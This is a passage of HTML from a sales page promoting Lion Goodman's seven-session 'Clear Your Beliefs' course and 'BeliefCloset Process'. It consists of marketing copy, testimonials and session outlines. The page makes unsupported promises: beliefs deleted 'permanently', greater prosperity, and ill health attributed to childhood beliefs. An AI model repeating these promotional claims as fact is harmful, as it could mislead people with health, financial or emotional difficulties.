it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div 